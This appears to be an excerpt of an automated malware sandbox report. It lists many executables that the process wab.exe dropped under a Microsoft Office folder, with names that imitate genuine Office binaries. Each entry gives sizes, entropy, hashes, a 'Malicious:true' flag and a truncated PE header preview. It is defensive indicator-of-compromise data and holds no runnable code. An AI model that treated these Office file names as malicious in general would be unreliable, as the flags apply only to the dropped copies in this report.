                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1568248
                                                                              Entropy (8bit):5.637684770188403
                                                                              Encrypted:false
                                                                              SSDEEP:12288:QwF+k53zCG2tIuQ6DtJQSZDhLOhkZzV5i9w/lmd+jrcUiACW:lFXG6uQ6D9L2uV50AlmsjYUiAB
                                                                              MD5:121C03BBA1251851A260DBF96511E94B
                                                                              SHA1:E11BABB614ED80A1C9CD053E2D25B6F7DF6E0B29
                                                                              SHA-256:8C448212DF185668CAF1A984DC7BD9BF6A98FC30EFC35C509B4B6204B1CFA544
                                                                              SHA-512:0BA4A192DC50C8CF02C1FE67448E907D5F0D68008F2471EEF4DA17D601C5799893E151AE2373594F25C891CCDA6EBD3B02313C5C3D7874D5EC6179FE64978FD0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):634800
                                                                              Entropy (8bit):6.637580106141556
                                                                              Encrypted:false
                                                                              SSDEEP:12288:1f/4sOdw+RfEB6tuAlnWhGZco6ijmn5jFTSt7yCPUkazi7JThVoSZeR6aQTJ:h/4Vdw+Ra6V6g2kazidN6SoEVF
                                                                              MD5:D40F85B4848B912F785873A0F65929F8
                                                                              SHA1:6DBC6F68210F0614C88123391277797A44EED64A
                                                                              SHA-256:FA0CF60A3DE793BBFB2BF327A9CD8BF13D7B0A443EE063B160DAAEA98129C678
                                                                              SHA-512:78D0223530930F5891AE52E7F752B0637B449EEFC0FADF9E3E27B9EABAF49834EFA805A897C512A7D8C09F466DA98A402D09C1F02C6827843E6AF961C60702E6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):748192
                                                                              Entropy (8bit):6.652535866207215
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sKxLM1deLycUTc1kZi7zb1QRHhhj7WGvF5PYcdTFtZ3G97aSDGGHrbTwqFwydBf6:syY14evTc1kZi7zb1KHL8vbTlwOBC
                                                                              MD5:6BA8B9E3FE4CDE976E7480E68BC2D0DF
                                                                              SHA1:88A1B0CCECBB9F1D10303D6E727C7C8CAD46B157
                                                                              SHA-256:B5D160CF12ECEDC0FADAB400C24A4B0096332CFD18ECACEE97A7D746EA36EA0F
                                                                              SHA-512:0B7157C1FDA4F97CF56A2562FDF678EB946AE9FF76A6102487F6A32B146684A5E12D532802185AEEEC6AF99AFB026E6C7A71AB4BC3D85891923EAB91B246F915
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1917048
                                                                              Entropy (8bit):3.7936073169931026
                                                                              Encrypted:false
                                                                              SSDEEP:6144:PBeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTOMzwMwZ:ZKs78A5UcyOPexxPcUcMeyvZ
                                                                              MD5:1C15447004EDADF6833C19CB490ECE02
                                                                              SHA1:EC2BDA5403AE8E0D06EA17CB56B70A6129E95FD5
                                                                              SHA-256:29A87A9191EC08DDAAA96ADCAE7B131997BD487BECCF9182CB1CA517B8B9A1C6
                                                                              SHA-512:2420427BA2F4FB7CC886AC96A38BA7909FD5403244EA9F0927A9CF83C22C2C46BEE2565ED8C9F5637D533A88916587D0B2677F4AB13B13A78526C6D26531D696
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4099520
                                                                              Entropy (8bit):3.697376679380454
                                                                              Encrypted:false
                                                                              SSDEEP:12288:hyKs7cvZIFpCYVIUN2mGsb8HtkLaHLH04cLbUBRjLmP29DyZbT9oc/m06aCzE6hE:hyKsY+dy0ZScIBqBT11S0
                                                                              MD5:89B7FD5BD551EB1C9F7347C6FB777C6F
                                                                              SHA1:994B8F597860E88D2A0F56D2F4A1D46756F47307
                                                                              SHA-256:267D501C9F2904DE5E11EB3D6D33AD081356D97F84388528E3B517691C1283A8
                                                                              SHA-512:011AF68C1390FC0B4FC853FF96310ADF8936136C21D5E8909BF16A7E7FAF1CA324047CA03EACB16E6071A8AD9FA0943EC4937C51F895A3B6B162FAF7AE6C3D4F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):452120
                                                                              Entropy (8bit):5.929411837073156
                                                                              Encrypted:false
                                                                              SSDEEP:6144:EvhCpFviM0OKAOVf3m+2fCz29fx8/eAeTu:EEpFVKj3mFn9q
                                                                              MD5:8895327CB903B0DC08F23035A992E2B2
                                                                              SHA1:C03E385FB58E49047E5E8A338265793EC94731EC
                                                                              SHA-256:F9D3CDD157B30B4A98770225BFCCDDA2E71511B3A90339BFD2C8EBE11F05E3CF
                                                                              SHA-512:B8D4557F3B8B67D7F569953FDB2A36F2F396B516F40751F6E6B2C905F614F552A163028772514B93C39B0724AB7B734E4BBECF361EDA2FA6BF8DF62740A51CA2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):116664
                                                                              Entropy (8bit):6.10338252591718
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoSpuG+Ogz7jzJQHt9+zwIws8p95Zs0v+ISDr34+3RnQymkst:/rk5uGaz7jFQ68ICP5q0WISDr34W+wst
                                                                              MD5:6A915BA50F7E345F1062F27B1CA597F8
                                                                              SHA1:EA91C6AE9800EA18BB949492D41CD42769CD6D7A
                                                                              SHA-256:C3075BEF0B2FACF27E33C4CDF19DD11BC1C5DC93CDCC710B3C6B6C3AD7FB42A8
                                                                              SHA-512:7AD107B4FDC3776269717D28A789BD8D2ADA898DF1FE34DDC3B93FFDFA9CCC6E01F017914F2D3FCECB23789147C43FB420AD099E0D2FEDDE106F18333CDA1112
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):167392
                                                                              Entropy (8bit):6.22614950708567
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkgWKZbTKeR3Tzp+8IxR8jYYrjHaVLIPSL1CgNX:fWK11Rp+8II5SLUgp
                                                                              MD5:4B763805BE542D63E26C934813DD48E1
                                                                              SHA1:FE1C7ACF48DC8EB78744DDC16CFA04A232A8D8E9
                                                                              SHA-256:500DBAA3FBAF86BE75A82B70BEA0C6550112B14C93FE4F87EBA018D787780D49
                                                                              SHA-512:FFB9A1D674800302C4B7156DE4C49FF2421774061FFBCBE2E058BD119EE310DCF65CA2B123133FE05C2430613463DED3DA76AC1DD91EA0E18CC28AC036703EA2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):670928
                                                                              Entropy (8bit):5.936386014437268
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4wbRB+ZRhFfGNpzX5PtiPWRnTLtx5eq4/RnYRoS2Ds+2EYR1XLlShtg7ksyST2Rz:4wbT+ZR3fGrzX5PtiPWRnTLtx5eq4/R9
                                                                              MD5:EC4DCAECC36C36010C2E887BCF43E330
                                                                              SHA1:E03D5A16C55182C2A2C3FEC77FA2B61DED2E8452
                                                                              SHA-256:106C086E34880154252DC126B873022482E00DC5393221D0EEB58B6DD3F61613
                                                                              SHA-512:CE653BB3AB1802439105C08E7DEEDB2FBF1800D5BADE205F44DCBE9BF000B0F439C948C273A45DA18A18C87D85EB7E64331992877EB8EB9D981C1CAB2C3E40E0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):115920
                                                                              Entropy (8bit):5.6753678855989245
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoEw9K75Rp1Ukkz2zct/rzdaBotnMuvWM6TUaE:/rkDw9K1Fiz2ir+o5vWM6TUaE
                                                                              MD5:EA8D8609056B190AC92C23DD650BD6EF
                                                                              SHA1:6426393186982F636CE121704382ABDFF75BB4A7
                                                                              SHA-256:D2D09630ED66662A22F768DBC36F5202CC502D8FC58E6A2A5D29F59700006020
                                                                              SHA-512:453D530CFEEA78084339119658DC2397A6848D19902AAB31B7BADB46EED6DAAECEA2564664181C724F8F16A9D616CF7DE44C03532AC2A306B48F97B10D4918B9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):137776
                                                                              Entropy (8bit):6.120121862589257
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoMLS+I1HtQdiHN4zbyezltnzGd1XuDxhkrTJwNZ5wmW1aHbfC:/rkCMi+zWeXdswvqiHm
                                                                              MD5:829CB1493FD8C6F15376EEF64761531A
                                                                              SHA1:282C572395117635B1C4C44732EEDE8CD65AF5F7
                                                                              SHA-256:BFA3A7A9ABC6AFD35B2748CF257FD12A521722142ED9CA73B4E0B39A5190118B
                                                                              SHA-512:243F353303DC74EF1183026EE65591BBFCB304F26A5CBE3E9E2EDEFA9946BF89C11BCA788EFC90B474D79371B5D38D13B6DBC466DB973BE5D9C570F168153D19
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1206680
                                                                              Entropy (8bit):4.8259897811858545
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+61ZFViRpx5tuwZl4asd/arEISgX0IkEMhTy:+61jViRTfVINdCr6gX0hEl
                                                                              MD5:FB2BD6E7F39070E272740B92E84DB8AA
                                                                              SHA1:1E7368F37A4E27701A124DE31E3604FF5F100EBB
                                                                              SHA-256:1B338C2D04893C390870D5B7E554BF2926CDBB9BEA3058D459E09A07F416C843
                                                                              SHA-512:88BA77D8180704EF8D7C9CA704A099D7945C13FF33099C26F59026E6A30E908F276B14081DDF01CFB86459F242DCA83E8B6C17D0172BC1DCA16F88B995D14939
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):400336
                                                                              Entropy (8bit):6.545670669710066
                                                                              Encrypted:false
                                                                              SSDEEP:12288:G1rOCPapfd5bhooUBuFiExw/LXa20Dj6EzfJ:CrfIbbhooUBu3wzXa/Dj64
                                                                              MD5:AB23B72F228F04A0DAFFF541E32A4EBA
                                                                              SHA1:8770A0BAD7E668DEE5D226192DFA580B41F9878E
                                                                              SHA-256:50FD4D6AE87587BE2E99F87FB937644EAD3D0F09BA41D18BFF24EFD8606F9DF4
                                                                              SHA-512:658970F71F357BA0F241F14D77A3C59FFFB1A1961F75A9DD2C236412A0D451D109326DDE160A49FAE6776926B5912D01E8181709F6089C3567B906B5395D442D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1662344
                                                                              Entropy (8bit):4.231175782494914
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkfK2OKsuWoZEsVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbNDzVY9:IztkAzkAZqrEdrEAZUCwFjNNYEzcL
                                                                              MD5:92FA319DBFAB7C5461D7090E78829B86
                                                                              SHA1:484EE02AD12B66F92F34DFD4B420F7A6632AC2A0
                                                                              SHA-256:776CCAC7EC3B35D5C22D5B67F8A167CFF50554EC1D31D679EE315353CA8B092D
                                                                              SHA-512:E2FE18E0F9CE8E648042B626E7D516149A300E121B9FC94911DBD88EF74855C57F9926807528BA1423F262F65AE4044EFB1A669FF9AD21B818CACED6069BF847
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3531712
                                                                              Entropy (8bit):3.7572585003160985
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rks2OKsuWoZE/B/SRD17QYFCYKsQojSXQojSfE1c9AvWiYwOsAE1c9881jLvsDF:GgSRJQYKV++VYwjatvsDVpDsehRAKzYM
                                                                              MD5:BFB3BE900341A821EBD55FA532ECE5EE
                                                                              SHA1:766D0BA424A86EBD4ADFA3E35BBC161BC0BF286C
                                                                              SHA-256:B89EABA2791BD53C106CB478B3AFD3A06D1AA34C12C067324C5954B1560F9AA9
                                                                              SHA-512:2A053A3F810B6DAC703B42A0628168B774DB051B390335725429AB566294E389BACBDA0BF5BF7378EB59A2EF769E73BB45736464E1BB3CBF5CC15CDBFC53B459
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):83880
                                                                              Entropy (8bit):5.823944915840722
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoNKfEBr3fHT4nAzHGkYJ+ziw6+zb:/rkePh3IAzHGEJn
                                                                              MD5:FC67F440A689C3EE90251D6C2C4E2C9D
                                                                              SHA1:7F20C0098B95C41AC33A96F4ABF0581AE3E5D995
                                                                              SHA-256:F428B30BEB050212F0A9E6FA72E4D7FCF86CD52B3FB9FD43E5A0FC54C3B489BB
                                                                              SHA-512:982943EE35AA49ADAB5E45E7FD7AD209FF4BE057C71B2B732DDDCFC78B3673C0EC8CEA83B7DA2C82BAE73BE0E1B4A0C66C497F519C5F46AB31BB6CB7D247DE06
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4319112
                                                                              Entropy (8bit):3.7943883996506433
                                                                              Encrypted:false
                                                                              SSDEEP:6144:uUh82lTMY/C3uuQyMyquNlBXYJ7M444IB:ukyIgG47B
                                                                              MD5:FEB87B50F28805BBBFD4E61540E74928
                                                                              SHA1:8AD8B96031374469E1C8A6603B20B2D54D6952C3
                                                                              SHA-256:54B62651B987E81F90B6B8BB1F74CDACE2B0FA0D507B97DD45D789F8377A38F9
                                                                              SHA-512:ABA09F5254CB6BF70093997C4347DC545254C7C289723C62287F2D31D9F0B41206380DAF93E5F8DA0F2D5A3BC1BF0F18C5F6746E83948C36F4A6954789E4784A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):785448
                                                                              Entropy (8bit):3.8385138127727325
                                                                              Encrypted:false
                                                                              SSDEEP:6144:oWSXeSC+hBMdNRneNMToeGYeneqjpGtBlmF:oLevUEcLe9l2
                                                                              MD5:1402F0423B2FB1FF2782284DD0D90BD8
                                                                              SHA1:7CA6379EE4FA2348E7373632E689715AA8451C8E
                                                                              SHA-256:E4268E89FF0D78048C987424945B1C65773926EBD9122923E1B84D2D7ED0476D
                                                                              SHA-512:22B2A31E677A410EEF0CB40587EC881E2D29EB06B64123116A6E58572C1FD9B53DFB73B788A42C3DC0E615C88BE3BD949CC2E04F3422A4130B4954AE129F4B11
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1081280
                                                                              Entropy (8bit):3.6924247178826266
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkOyTUawK12P04ti0o5gmQNJDJnJG20FxPlJPJSS12Zzwww6G:9s4wqmQN59wtSS2zwmG
                                                                              MD5:C375297B394AD1111289612F87FFEA9F
                                                                              SHA1:F5FC1F348DD8344D9BCEA024964BB0B5FF018B01
                                                                              SHA-256:ABF9CE89E824EC6E39F30000F3F8928FCDD6E506897505B9E19CEC4EBF7E5E1A
                                                                              SHA-512:E0F105D82F4E0BC6F503877F56D48CC742A702C5A80665B9C97F674A5F1EBB18567E78DB5B180E9FC1A252C0682D33980F553C8700DDB31A7A45ECD727CA48B6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1722808
                                                                              Entropy (8bit):6.458274782007939
                                                                              Encrypted:false
                                                                              SSDEEP:49152:vuoh1EWXRkd+h9y6NsRZ9MtL4kD5G5LVuhqITJemL9SQM3:vuohO2km9PNsRZ9MtL4ktG5LV93
                                                                              MD5:C94CAD958EFE5BB77D4D31CF9D62D863
                                                                              SHA1:D1BD3FCDD57BDE432F49D020985257B26014C84D
                                                                              SHA-256:B9A4C86E6AFD87E343FF29FA306FE257A426AF7C4F3B30F0172735D9FCCCDA2D
                                                                              SHA-512:4547EB7B45411F4AFD00E2C35DA91BFA142B5B11151466C888A0ED6BC20A326DFBF8D4B1BBBFA8FA56DFDFDE40DABAB7FE26F88A838B9BEBF22A0097F54E7106
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):307784
                                                                              Entropy (8bit):6.374475137741311
                                                                              Encrypted:false
                                                                              SSDEEP:6144:9+OpwoajoJ/cLr6eNI0A2kg79zge/ceeE1+v:9DWhS5g72veeU+v
                                                                              MD5:6BF22D15646E7998D748CD42C23AB626
                                                                              SHA1:89D49CF33D773AD86B4E1CC7D9E7021216B937B0
                                                                              SHA-256:AF364BB28D01FC59D7A9A9CD9A2CACC66D0E0020C64D93E8C5A0BBC95DFE8C6E
                                                                              SHA-512:3BF8681007FE707F8E87B28F0D0F6263C6247FE251C2B9339322063B029BACA0BDB9FFD5058B02C04132765F08A39933D8663CA7444441294E0C5888D3D8F2F4
                                                                              Malicious:true
